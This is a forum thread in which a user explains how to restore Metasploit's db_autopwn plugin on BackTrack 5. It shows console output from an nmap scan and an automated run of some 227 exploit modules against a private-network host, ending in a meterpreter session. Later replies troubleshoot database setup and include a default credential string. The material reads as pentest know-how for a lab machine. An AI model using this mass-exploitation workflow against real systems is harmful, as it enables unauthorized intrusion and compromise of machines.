Results 1 to 8 of 8

Thread: db_autopwn BT5r1 -msf4.2.0-dev

  1. #1
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default db_autopwn BT5r1 -msf4.2.0-dev

    hi,guys
    if you want to use not total function of "ex"db_autopwn in metasploit 4.2.0-dev bt5r1
    go here:
    https://raw.github.com/neinwechter/m.../db_autopwn.rb
    copy & paste the script
    rename db_autopwn.rb
    mv the script in /opt/framework/msf3/plugins/
    chmod +x db_autopwn.rb

    now
    root@bt:~# cd /pentest/exploits/framework
    root@bt:/pentest/exploits/framework# ruby1.8 msfconsole -q
    msf > db_driver[*] Active Driver: postgresql[*] Available: postgresql
    msf > /etc/init.d/postgresql-8.4 start[*] exec: /etc/init.d/postgresql-8.4 start ####i've installed postgresql-8.4 (method first BT5)
    msf > workspace MyProject[*] Workspace: MyProject
    msf > load /opt/framework/msf3/plugins/db_autopwn.rb[*] Successfully loaded plugin: db_autopwn
    msf > ?

    db_autopwn Commands
    ===================

    Command Description
    ------- -----------
    db_autopwn Automatically exploit everything


    Core Commands
    =============

    Command Description
    ------- -----------
    ? Help menu
    back Move back from the current context
    banner Display an awesome metasploit banner
    cd Change the current working directory
    color Toggle color
    connect Communicate with a host
    exit Exit the console
    help Help menu
    info Displays information about one or more module
    irb Drop into irb scripting mode
    jobs Displays and manages jobs
    kill Kill a job
    .................................................. ..................................
    .................................................. ...........
    msf > db_nmap 192.168.1.165[*] Nmap: Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-12-30 17:28 CET[*] Nmap: Nmap scan report for HACKDANY.homenet.telecomitalia.it (192.168.1.165)[*] Nmap: Host is up (0.0015s latency).[*] Nmap: Not shown: 992 closed ports[*] Nmap: PORT STATE SERVICE[*] Nmap: 80/tcp open http[*] Nmap: 135/tcp open msrpc[*] Nmap: 139/tcp open netbios-ssn[*] Nmap: 443/tcp open https[*] Nmap: 445/tcp open microsoft-ds[*] Nmap: 3306/tcp open mysql[*] Nmap: 5800/tcp open vnc-http[*] Nmap: 5900/tcp open vnc[*] Nmap: MAC Address: 08:00:27:F1:F2:8F (Cadmus Computer Systems)[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
    msf > db_autopwn -p -e -q -R great
    [-]
    [-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
    [-] This code is not well maintained, crashes systems, and crashes itself.
    [-] Use only if you understand it's current limitations/issues.
    [-] Minimal support and development via neinwechter on GitHub metasploit fork.
    [-] [*] (1/227 [0 sessions]): Launching exploit/windows/iis/ms01_026_dbldecode against 192.168.1.165:80...[*] (2/227 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.1.165:80...[*] (3/227 [0 sessions]): Launching exploit/windows/http/ca_totaldefense_regeneratereports against 192.168.1.165:443...[*] (4/227 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_main against 192.168.1.165:80...[*] (5/227 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil against 192.168.1.165:443...[*] (6/227 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.165:139...[*] (7/227 [0 sessions]): Launching exploit/unix/http/lifesize_room against 192.168.1.165:80...[*] (8/227 [0 sessions]): Launching exploit/windows/http/sapdb_webtools against 192.168.1.165:80...[*] (9/227 [0 sessions]): Launching exploit/unix/webapp/dogfood_spell_exec against 192.168.1.165:443...[*] (10/227 [0 sessions]): Launching exploit/multi/http/freenas_exec_raw against 192.168.1.165:443...[*] (11/227 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.165:445...[*] (12/227 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.165:139...[*] (13/227 [0 sessions]): Launching exploit/windows/http/ca_arcserve_rpc_authbypass against 192.168.1.165:80...[*] (14/227 [0 sessions]): Launching exploit/multi/http/glassfish_deployer against 192.168.1.165:80...[*] (15/227 [0 sessions]): Launching exploit/windows/iis/iis_webdav_upload_asp against 192.168.1.165:80...[*] (16/227 [0 sessions]): Launching exploit/windows/http/apache_mod_rewrite_ldap against 192.168.1.165:443...[*] (17/227 [0 sessions]): Launching exploit/windows/mssql/mssql_payload_sqli against 192.168.1.165:80...[*] (18/227 [0 sessions]): Launching exploit/windows/http/efs_easychatserver_username against 192.168.1.165:443...[*] (19/227 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_ovjavalocale against 192.168.1.165:443...[*] (20/227 [0 sessions]): Launching exploit/windows/http/fdm_auth_header against 192.168.1.165:80...[*] (21/227 [0 sessions]): Launching exploit/unix/webapp/generic_exec against 192.168.1.165:443...[*] (22/227 [0 sessions]): Launching exploit/windows/http/coldfusion_fckeditor against 192.168.1.165:80...[*] (23/227 [0 sessions]): Launching exploit/windows/http/zenworks_uploadservlet against 192.168.1.165:443...[*] (24/227 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovalarm_lang against 192.168.1.165:443...[*] (25/227 [0 sessions]): Launching exploit/unix/webapp/openview_connectednodes_exec against 192.168.1.165:443...[*] (26/227 [0 sessions]): Launching exploit/linux/http/piranha_passwd_exec against 192.168.1.165:80...[*] (27/227 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli against 192.168.1.165:443...
    .................................................. ..........................................
    .................................................. .................................
    *] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...

    msf > sessions -i 1[*] Starting interaction with 1...

    meterpreter > WORKED FINE

    PS :the FUNCTION """"" -I """""""""for the range targets dont work!!!!
    regards zimmaro

  2. #2
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Riferimento: db_autopwn BT5r1 -msf4.2.0-dev

    sorry one little advice
    after:
    db_driver postgresql .............digit

    db_connect root:toor@127.0.0.1:5432/metasploit (this is my credenial register ""during postgres install""[look the more guide to postgresql-8.+4 in BT5]
    sorry again.....but ....haste is a bad counselor!!!!
    regards

  3. #3
    Member muminrz's Avatar
    Join Date
    Jan 2010
    Posts
    64

    Default Re: db_autopwn BT5r1 -msf4.2.0-dev

    Thanks zimmaro

  4. #4
    Just burned his ISO
    Join Date
    Dec 2011
    Posts
    4

    Default Re: db_autopwn BT5r1 -msf4.2.0-dev

    zimmaro you save the day.

    thanks.

    5 stars

  5. #5
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    7

    Default Re: db_autopwn BT5r1 -msf4.2.0-dev

    haha, i found when I updated to msf4.2.0-dev, there is no db_drive function, hehe, how to do next ???

  6. #6
    Just burned his ISO
    Join Date
    Sep 2011
    Posts
    5

    Default Re: db_autopwn BT5r1 -msf4.2.0-dev

    zimmaro, need your help on this


    msf > db_driver[*] Active Driver: postgresql[*] Available: postgresql
    [-] Unknown command: db_driver[*].

  7. #7
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: db_autopwn BT5r1 -msf4.2.0-dev

    hi buckingham
    if you have 4.2-release(no dev) the command db_driver is REMOVED & in my BT postgresql "autostart":
    try only db_status & watch if have ...connect to msf3...
    bye

  8. #8
    Just burned his ISO
    Join Date
    Sep 2011
    Posts
    5

    Default Re: db_autopwn BT5r1 -msf4.2.0-dev

    yes, its connected to msf3

    msf > db_status[*] postgresql connected to msf3

Similar Threads

  1. db_autopwn
    By JazzHans in forum Beginners Forum
    Replies: 1
    Last Post: 12-04-2010, 11:43 AM
  2. db_autopwn
    By some0ne in forum OLD Pentesting
    Replies: 1
    Last Post: 11-02-2009, 01:36 AM
  3. db_autopwn
    By some0ne in forum Discussioni Generali
    Replies: 2
    Last Post: 10-16-2009, 08:48 AM
  4. db_autopwn -p -t -e 192.168.2.7
    By virusc in forum OLD Newbie Area
    Replies: 2
    Last Post: 04-01-2009, 03:31 AM
  5. need help with db_autopwn
    By unlazyfree in forum OLD BackTrack v2.0 Final
    Replies: 12
    Last Post: 08-15-2007, 10:30 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •